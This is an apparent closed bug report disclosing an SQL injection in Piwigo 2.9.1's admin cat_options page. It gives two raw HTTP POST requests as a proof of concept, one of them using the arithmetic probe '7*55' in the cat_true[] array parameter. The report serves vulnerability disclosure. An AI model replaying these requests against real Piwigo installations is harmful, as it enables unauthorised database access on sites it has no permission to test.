Bug Report: SQL injection in page cat_options #724

Closed
@Akityo

Proof-of-Concept

version:2.9.1

section status

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_false%5B%5D=755&trueify=%C2%AB

section comments

POST /piwigo/admin.php?page=cat_options&section=comments HTTP/1.1
Host: www.test.com
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=comments
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_true%5B%5D=7*55&falsify=%C2%BB

Report by Topsec (Li Zhiqiang)
